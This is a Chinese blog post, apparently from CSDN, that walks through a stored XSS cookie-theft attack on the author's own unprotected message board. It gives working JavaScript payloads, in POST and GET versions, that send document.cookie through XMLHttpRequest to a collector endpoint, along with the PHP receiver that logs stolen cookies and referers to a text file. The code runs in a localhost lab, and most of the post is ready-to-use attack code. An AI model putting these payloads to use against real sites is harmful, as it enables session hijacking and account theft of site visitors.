XSS之存储型xss获取cookie试验(ajax方法)

最新推荐文章于 2024-06-25 10:08:51 发布
最新推荐文章于 2024-06-25 10:08:51 发布
阅读量4.3k 收藏 4
点赞数 2
分类专栏: XSS 文章标签: cookie ajax xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34847808/article/details/80681314
版权

1、首先我写了个非常简易的留言板,没有做人任何安全处理,能使用存储型xss

2、留言里写入能够发送请求的js代码,提交后服务器将代码存储到服务器中,用户访问的时候就会触发这段xss代码。让访问这个页面的用户能够发送一个请求并附带自己的cookie信息。

3、第二步请求的目标主机上放置一个脚本用来接收这个请求然后保存在文本中

具体步骤:

一、登录我写的留言板,留言写入xss代码


提交后页面显示如下:

内容被被保存到数据库中,每次用户查看这条留言,就会触发一次xss。

再次访问这个页面,查看控制台,访问这个页面时发送了POST请求

二、写一个页面用用来接收这个请求中的cookie。请求的是我本机上的cookie1.php文件。并保存到一个文件中。

OK了 。

以下的是发送POST请求js代码:

<script>
var url='http://127.0.0.1/cookie1.php';
var data='cookie='+document.cookie;
var xhr= new XMLHttpRequest();
xhr.open('POST',url);
xhr.setRequestHeader('content-type','application/x-www-form-urlencoded');
xhr.send(data);
</script>

send(data),只适用于发送POST数据。发送方式为get请求发送的时候send()参数为空。

接收端代码:

<?php
date_default_timezone_set("Asia/shanghai");
$cookie = $_POST['cookie'];
$time = date("Y-m-d H:i");
echo $time;
$refer = $_SERVER['HTTP_REFERER'];
$content = $time."::"."$refer"."::".$cookie."\r\n";
file_put_contents("cookie.txt", $content, FILE_APPEND);
?>

 

 

这是GET版的:

发送GET请求的js代码:

<script>
var url='http://127.0.0.1/cookie1.php';
var data='?cookie='+document.cookie;
var xhr= new XMLHttpRequest();
xhr.open('GET',url+data);
xhr.send();
</script>

接受端代码:

<?php
date_default_timezone_set("Asia/shanghai");
$cookie = $_GET['cookie'];
$time = date("Y-m-d H:i");
echo $time;
$refer = $_SERVER['HTTP_REFERER'];
$content = $time."::"."$refer"."::".$cookie."\r\n";
file_put_contents("cookie.txt", $content, FILE_APPEND);
?>

GET版本的效果:




张飞很帅
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】XSSCookie外带攻击姿势及例题详析
等风来
05-19 7156
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
使用Django简单编写一个XSS平台的方法步骤
09-19
- **XSS攻击基本原理**:XSS攻击主要分为三种类:反射XSS存储XSS和DOM-based XSS。在这篇文章中,我们将重点介绍反射XSS的实现方式。 - **反射XSS**:攻击者将恶意脚本注入到一个URL中,当受害者点击...
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1744
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
XSS 安全漏洞介绍及修复方案
最新发布
墨鸦的博客
06-25 6636
XSS 安全漏洞介绍及修复方案
实战:存储XSS攻击获取Cookie及防御
qq_43535990的博客
11-06 8579
实战:存储XSS攻击获取Cookie及防御一、存储XSS攻击原理二、搭建测试网站1.phpstudy开启Apache和mysql服务2.搭建数据库3.创建网站文件4.书写代码三、创建xss攻击文件四、上传payload获得用户Cookie 一、存储XSS攻击原理 在讲解存储XSS攻击之前,我们要先明白XSS是个什么东西。 XSS(Cross Site Scripting)跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意
web安全中存储XSS手动获取cookie信息
qq_63539335的博客
01-14 561
web安全中存储XSS漏洞,基础手工攻击演示
XSS基础入门/从0到1/非常基础/cookie/会话劫持
ChenD的学习笔记
10-10 1488
cookie介绍、XSSXSS盗取cookie、利用Cookie劫持会话
Ajax XSS样例
09-18
XSS攻击主要分为三种类存储XSS、反射XSS和DOMXSS。 在"06.28_sina_XSS.txt"这个文件中,我们可以推测这可能是新浪网站遭受XSS攻击的一个实例,攻击者利用了某种方式将恶意脚本注入到新浪的页面中。攻击者...
XSS跨站脚本攻击在Java开发中防范的方法
01-09
1. **存储XSS**(Persistent XSS):这种类的攻击发生在用户提交的数据被持久化存储(例如数据库),并在后续请求中返回给其他用户或原始用户的情况。攻击者可以通过论坛帖子、评论或消息等渠道注入恶意脚本。 ...
Advanced xss
09-14
- **存储 XSS**:恶意代码被永久存储在目标服务器上,并随着正常内容一起发送给所有用户。 - **反射 XSS**:恶意代码包含在 URL 查询字符串中,当用户点击恶意链接时,恶意代码就会被执行。 - **DOM 基于的 XSS*...
信息安全技术基础:XSS攻击概述.pptx
11-01
存储XSS则更为危险,因为恶意脚本被永久地存储在服务器的数据库中,当其他用户访问含有恶意数据的页面时,脚本会被执行。常见场景如论坛、博客的评论功能,攻击者在提交评论时插入恶意代码,一旦评论被发布,所有...
实验111
08-03
总结起来,实验111展示了XSS攻击的多种方式,包括反射式XSS存储XSS和DOM-based XSS,以及如何利用这些攻击手段进行Cookie盗窃和操纵用户行为。同时,它也强调了网站安全的重要性,如正确处理用户输入、防止CSRF...
Ajax安全技术讲解教材
12-22
- **类:** 存储、反射和DOMXSS。 - **防护:** 对用户输入进行严格的过滤和转义,使用HTTPOnly Cookie防止JavaScript访问敏感信息。 2. **跨站请求伪造(CSRF):** - **原理:** 攻击者诱使用户在不...
基于PHP+MySQL+Ajax实现的在线二手书交易平台+源代码+详细文档
06-02
MySQL是流行的开源关系数据库管理系统,用于存储和管理平台上的书籍信息、用户信息和交易记录。在这个项目中,开发者会创建相关的数据库表,例如用户表、书籍表、订单表等,并编写SQL语句进行数据操作。 **3. ...
ASP+AJAX聊天室 1.0
04-30
聊天室的数据可能存储在关系数据库如MySQL或Access中,包括用户信息、聊天记录等。服务器端的ASP代码负责与数据库交互,执行查询、插入、更新等操作。 8. 用户认证与会话管理: 考虑到可能的登录功能,ASP提供...
chat_ajax
03-12
由于涉及到用户输入和数据存储,chat_ajax需要考虑安全问题,如防止SQL注入、XSS攻击等。这需要在服务器端进行输入验证和过滤,以及使用预处理语句或参数化查询来保护数据库。 9. **调试与优化** 开发过程中,...
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1397
好切回正题,这段代码的是正则表达意思就是把这些'/
简单的利用XSS获取用户cookie
shy的博客
10-25 4303
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
Pikachu (xss跨站脚本攻击)
weixin_54431413的博客
03-28 4579
xss概念 跨站脚本攻击(Cross Site Scripting)缩写为CSS 但与样式css容易混淆,所以简记为xss,分为三个类,非持续性(反射),持续存储),dom。 其中 持续 危害最大。 一、反射xss get) 1.右击检查,页面源代码,可以看到form表单提交的数据显示在下面 2.用<script>alert(1)</script>弹窗测试 出现弹窗显示 数字1 3.也可以构造出查看cookie的js语句 messa.
xss反弹cookie
07-29
XSS(跨站脚本)攻击是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来获取用户的敏感信息,如cookie。根据提供的引用内容,可以看出这是一个XSS攻击的示例代码。 引用\[1\]和引用\[2\]是两种不同的XSS攻击方式。引用\[1\]是通过GET请求将用户的cookie发送到指定的URL,而引用\[2\]是通过POST请求将cookie发送到指定的URL。这些代码都是恶意的,旨在窃取用户的cookie信息。 引用\[3\]是一个PHP脚本,用于接收并记录被窃取的cookie信息。该脚本将接收到的cookie、时间戳和来源URL写入到一个名为"cookie.txt"的文件中。 要防止XSS攻击,网站开发者应该采取以下措施: 1. 对用户输入进行严格的过滤和验证,确保不会执行恶意脚本。 2. 使用安全的编码方式,如将特殊字符进行转义,以防止脚本注入。 3. 设置HTTP响应头中的"X-XSS-Protection"为"1; mode=block",以启用浏览器的内置XSS过滤器。 4. 使用HTTP Only标志来设置cookie,以防止JavaScript访问cookie。 如果您是网站用户,请确保您访问的网站是可信的,并避免在不信任的网站上输入个人敏感信息。如果您是网站开发者,请确保您的网站采取了适当的安全措施来防止XSS攻击。 #### 引用[.reference_title] - *1* *2* *3* [XSS存储xss获取cookie试验(ajax方法)](https://blog.csdn.net/qq_34847808/article/details/80681314)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值